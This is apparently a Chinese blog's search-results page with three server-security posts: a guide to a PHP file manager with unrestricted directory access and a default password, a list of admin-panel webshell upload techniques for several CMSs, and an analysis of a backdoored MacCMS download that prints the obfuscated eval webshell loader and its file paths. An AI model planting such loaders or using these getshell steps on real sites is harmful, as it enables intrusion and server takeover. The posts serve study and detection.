找到
3
篇与
服务器安全
相关的结果
-
PHP文件管理器系统-单文件 文件管理器系统功能介绍与使用教程 一、系统概述 本文件管理器系统是一款基于单页PHP开发的轻量级文件管理工具,具备密码登录保护机制,支持对服务器任意目录下文件的创建、查看、编辑、删除等核心操作,同时提供灵活的目录导航与切换功能。系统采用简洁直观的界面设计,操作流程清晰,无需专业技术背景即可快速上手,适用于内部信任环境下的服务器文件管理工作。 特别提醒:由于系统支持访问服务器任意目录,取消了路径穿越限制,存在较高安全风险,仅限内部信任环境使用,严禁部署在公网或对外开放访问。 micm6uow.png图片 micm7apf.png图片 micm7lqo.png图片 二、核心功能介绍 2.1 安全登录机制 密码保护:系统采用MD5加密方式验证访问密码,默认登录密码为“123456”,只有输入正确密码才能进入文件管理界面。 登录状态管理:支持登录状态保持与主动退出功能,退出后需重新输入密码才能访问,防止未授权人员操作。 2.2 灵活的目录管理 目录导航:通过面包屑导航直观展示当前所在路径,支持点击任意层级目录快速跳转。 路径切换:提供手动输入路径功能,可直接输入服务器绝对路径(如Linux的“/var/www/html”、Windows的“D:\wwwroot”)切换至目标目录。 返回上一级:文件列表顶部提供“返回上一级”入口,方便在目录层级间快速切换。 2.3 完整的文件操作 文件创建:可在当前目录下自定义文件名和内容,直接创建新文件(支持文本类文件)。 文件查看:点击文件列表中的“查看”按钮,可直接展示文件内容,支持各类文本格式文件。 文件编辑:点击“编辑”按钮进入文件编辑界面,修改内容后保存即可更新文件,操作实时生效。 文件删除:支持单个文件删除,删除前会弹出确认提示,避免误操作;删除结果会实时反馈(成功/失败)。 2.4 文件信息展示 文件列表中清晰展示每个文件/目录的关键信息,包括: 类型标识:通过图标和文字区分“目录”与“文件”。 文件大小:自动将字节数转换为B/KB/MB/GB等易读单位。 修改时间:展示文件最后修改的时间(格式:YYYY-MM-DD HH:MM:SS)。 2.5 操作反馈机制 系统对所有操作结果(如登录成功/失败、文件创建/更新/删除结果、目录访问权限问题等)提供明确的消息提示,成功操作显示绿色提示框,错误信息显示红色提示框,帮助用户快速定位问题。 三、使用教程 3.1 系统登录 在浏览器中输入系统访问地址(如“http://你的服务器IP/file_manager.php”),进入登录页面。 在登录页面的“密码”输入框中,输入默认密码“123456”。 点击“登录”按钮,若密码正确则进入文件管理器主界面;若密码错误,页面会显示“密码错误!”的红色提示,需重新输入。 3.2 目录导航与切换 3.2.1 通过面包屑导航跳转 主界面顶部的“当前路径”区域为面包屑导航,例如当前路径为“/var/www/html”,导航会显示“[系统根目录] / var / www / html”: 点击“[系统根目录]”,可直接跳转至服务器系统根目录。 点击“var”“www”等中间层级目录,可快速跳转到对应目录。 3.2.2 手动输入路径切换 在面包屑导航下方的路径输入框中,输入目标目录的绝对路径(例如Linux系统输入“/home/user/docs”,Windows系统输入“E:\data\files”)。 点击“切换目录”按钮,系统会验证路径有效性: 若路径存在且可访问,会跳转至该目录并显示对应文件列表。 若路径不存在或无访问权限,页面会显示红色错误提示(如“目录不存在或无权限访问:xxx”)。 3.2.3 返回上一级目录 在文件列表顶部,点击“.. (返回上一级)”链接,即可跳转至当前目录的父目录。若当前处于系统根目录,则无此入口。 3.3 文件创建 先通过目录导航功能,切换至需要创建文件的目标目录(例如“/var/www/html”)。 在“创建新文件”区域,填写“文件名”(如“test.txt”,需包含文件后缀),确保文件名不为空。 在“文件内容”文本框中,输入文件需要保存的内容(支持任意文本内容)。 点击“创建文件”按钮,系统会执行创建操作并反馈结果: 成功:显示绿色提示“文件创建成功:test.txt”,新文件会出现在当前目录的文件列表中。 失败:若文件名已存在,显示“文件已存在!”;若无目录写入权限,显示“文件创建失败(可能无写入权限):test.txt”。 3.4 文件查看与编辑 3.4.1 文件查看 在目标目录的文件列表中,找到需要查看的文件(仅文件有“查看”按钮,目录无此操作)。 点击文件右侧的“查看”按钮,系统会加载文件内容,并在页面中部显示“编辑文件”区域,展示文件的完整内容。 3.4.2 文件编辑 通过“查看”功能进入文件内容展示界面,或直接点击文件列表中的“编辑”按钮。 在“文件内容”文本框中,对文件内容进行修改(支持全量编辑)。 修改完成后,点击“保存修改”按钮,系统会更新文件内容并反馈结果: 成功:显示绿色提示“文件更新成功:test.txt”,文本框中保持修改后的内容。 失败:若文件不存在,显示“文件不存在或不是常规文件!”;若无写入权限,显示“文件更新失败(可能无写入权限):test.txt”。 3.5 文件删除 在目标目录的文件列表中,找到需要删除的文件,点击其右侧的“删除”按钮。 系统会弹出确认提示框“确定要删除文件 xxx 吗?”,避免误操作: 点击“确定”:执行删除操作,成功则显示绿色提示“文件删除成功:xxx”,文件会从列表中移除;失败则显示红色提示(如权限不足)。 点击“取消”:取消删除操作,返回文件列表界面。 3.6 系统退出 在主界面右上角的“已登录”旁边,点击“退出登录”链接,系统会销毁当前登录状态,跳转至登录页面。退出后,若需再次访问,需重新输入密码。 四、注意事项 4.1 安全风险提示 本系统取消了路径穿越限制,可访问服务器任意目录,严禁部署在公网环境,仅可在内部局域网或信任环境中使用。 默认密码“123456”安全性较低,建议在使用前修改密码:找到代码中“$PASSWORD_HASH = 'e10adc3949ba59abbe56e057f20f883e';”这一行,将等号后的MD5值替换为自定义密码的MD5加密结果(可通过在线MD5加密工具生成)。 避免使用本系统管理包含敏感信息的文件(如数据库配置文件、服务器密钥等),防止信息泄露。 4.2 权限相关问题 文件/目录操作失败多与权限相关,常见问题及解决方法: 无目录写入权限:无法创建或修改文件,需通过服务器命令(如Linux的“chmod”命令)为目标目录赋予PHP进程可写入的权限。 无文件删除权限:需确保PHP进程对目标文件拥有删除权限,可通过修改文件权限或所属用户组解决。 无法访问目录:检查目录是否存在,以及PHP进程是否拥有该目录的读取权限。 4.3 其他注意事项 本系统主要支持文本类文件(如txt、php、html、css等)的编辑,对于二进制文件(如图片、视频、压缩包),不建议通过系统编辑,避免文件损坏。 操作前请确认文件内容的重要性,删除操作不可逆,建议对重要文件提前备份。 若系统提示“无法访问目录”或“文件操作失败”,可先检查路径正确性和权限设置,再进行后续操作。 五、常见问题解答(FAQ) Q1:登录时提示“密码错误”,但确实输入了“123456”,怎么办? A1:可能是管理员已修改默认密码,需联系系统部署人员获取正确密码;若为自己部署,可检查代码中“$PASSWORD_HASH”对应的MD5值是否为“123456”的加密结果(正确MD5值为“e10adc3949ba59abbe56e057f20f883e”)。 Q2:输入路径后提示“目录不存在或无权限访问”,如何解决? A2:首先确认路径是否正确(区分Linux和Windows的路径格式,Linux用“/”,Windows用“\”);其次检查该目录是否存在于服务器中;最后确认PHP进程是否拥有该目录的访问权限,可通过服务器权限管理命令调整。 Q3:创建文件时提示“文件已存在”,但文件列表中没有该文件,为什么? A3:可能是文件为隐藏文件(如Linux系统中以“.”开头的文件),系统当前未显示隐藏文件;也可能是文件名大小写问题(部分服务器文件系统区分大小写,如“Test.txt”和“test.txt”是两个不同文件)。 Q4:编辑文件后保存,内容未更新,是什么原因? A4:主要原因是目标文件无写入权限,需为文件赋予PHP进程可写入的权限;此外,若文件在编辑过程中被其他程序修改,也可能导致保存失败,建议确认文件状态后重新尝试。 第二款 micqrejy.png图片 PHP文件管理系统 下载地址:https://neictop-1256272185.cos.ap-guangzhou.myqcloud.com/2025/11/24/1763964194.zip 提取码:
-
渗透技巧 | 网站后台常见的Getshell技术整理 get也叫做拿webshell,通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站的webshell。 webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑,删除,上传或者下载,查看文件。渗透人员也可以通过这个webshell对服务器进行提权,提权成功后,会得到服务器管理权限。 一.WordPress的Getshell WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。 也可以把 WordPress当作一个内容管理系统(CMS)来使用。 1.更改模板处 复现: 第一步:找到外观->编辑->编辑模板。 l56e85vf.png图片 第二步:验证 l56e8hxo.png图片 2.上传主题 复现: 第一步:在上传主题处,上传一个主题压缩包,主题中需要含有木马代码。 ps:上传成功后,压缩包会自动解压。 l56e8t15.png图片 上传了一个qiesi的压缩包,成功后木马被自动解压出来 l56eav11.png图片 第二步:验证 l56edddr.png图片 二.DedeCMS的Getshell 1.任意文件上传 dede是织梦内容管理系统dedecms的简称,是一个PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。 复现: 第一步:在文件上传处,直接上传木马即可 l56edz9l.png图片 第二步:验证 l56ee5p3.png图片 2.模板配置 复现: 第一步:在模板—>默认模板管理—>修改index.htm模版内容 l56eeg4i.png图片 第二步:在生成—>更新主页的HTML中,将htm改成php后更新。 l56eengu.png图片 第三步:验证 l56euweg.png图片 3.广告内容 复现: 第一步:在 模板—>广告管理—>新增广告处 l56ez4xk.png图片 第二步:验证 l56f1mr5.png图片 l56f1sz4.png图片 三.南方数据CMS 南方数据企业网站管理系统V18官方主站、企业网站SQL版、好的企业网站管理系统、企业建站系统、南方数据企业CMS、企业网站SEO、网站优化、SEO搜索引擎优化机制、自助建站系统、前台全站采用静态html页面模板自动生成。 是由国内知名的CMS及电子商务管理软件开发商科创网络工作室**自主研发的新一代企业电子商务系统产品、同时提供各种网页模板、企业网站模板、免费企业网站系统、自动建站系统、全能型企业网站系统。 1.00截断 复现: 第一步:在 新闻咨询 -> 添加新闻 -> 上传处 l56f29o2.png图片 第二步:上传,使用00截断 l56f2frk.png图片 第三步:验证 l56f2muc.png图片 2.网站配置 复现: 第一步:在系统管理->常量设置处,插入代码 l56f30tk.png图片 第二步:验证 l56f3alq.png图片 四.pageadmin CMS PageAdmin CMS系统是基于.Net的网站管理系统,安全、稳定、灵活,全国用户超过百万,致力于为企业、学校、政府网站建设和网站制作提供企业级内容管理系统解决方案。 1.自解压 getshell 复现: 第一步:在文件管理处,选择模板上传,然后上传一个压缩包,其中压缩包里面包含木马。 l56f4hni.png图片 第二步:验证:成功。 l56f4mhq.png图片 2.利用配置文件,连接数据库,进行getshell 复现: 第一步:查看配置文件 l56f4t75.png图片 第二步:连接数据库 l56f4xji.png图片 第三步:验证,可以利用数据库进行命令执行。 l56f53kk.png图片 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
-
苹果CMS/MacCMS V10后门WebShell,第三方下载注意 苹果CMS/MacCMS 苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。 木马1.png图片 我一开始没有注意观察假冒官网网址www.maccmsv10.com页面和官网地址www.maccms.com非常像。 假官网页面 苹果cms1.png图片 MacCMS后门Webshell 查了一下百度 原因是 某天始,MacCMS官网因为某些原因停摆。同时在百度搜索苹果CMS或MacCMS出现的排名第一均为一个:www.maccmsv10.com的网址,而真正的官网地址是www.maccms.com。前者使用了一个和maccms官网一模一样的静态首页提供程序下载。最近几天陆续有人发现了从这个网站下载的苹果CMS程序存在后门webshell。 博主直接从该第三方站点下载了源码,至今10月15日依然存在后门,所以基本可确信是故意搭建的假冒官网。 后门文件路径 maccms10\extend\upyun\src\Upyun\Api\Format.php maccms10\extend\Qcloud\Sms\Sms.php MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643 cmsv10muma.png图片 <?php error_reporting(E_ERROR); @ini_set('display_errors','Off'); @ini_set('max_execution_time',20000); @ini_set('memory_limit','256M'); header("content-Type: text/html; charset=utf-8"); $password = "0d41c75e2ab34a3740834cdd7e066d90"; function s(){ $str = "66756r6374696s6r207374…………"; //大马 $str = str_rot13($str); m($str); } function m($str){ global $password; $jj = ''; eval($jj.pack('H*',$str).$jj); } s(); ?> MacCMS后门Webshell 很坦诚的孩子,一目了然 都不伪装一下!!! maccms_webshell1.png图片 登录webshell界面 maccms-webshell2.png图片 有些资历的老哥可能一眼就看出来了,这是一个习科大马改进版。 修复: 排查你的程序是否存在上面的后门路径文件 如果存在,删除后门文件,并进行全盘查杀扫描 手动查看可疑文件是存存在隐藏后门 检查服务器安全 如果是刚搭建的站点建议清除带木马程序的站点去MacCMS官网重新下载大搭建。 以下木马文件仅研究学习用。 点击下载
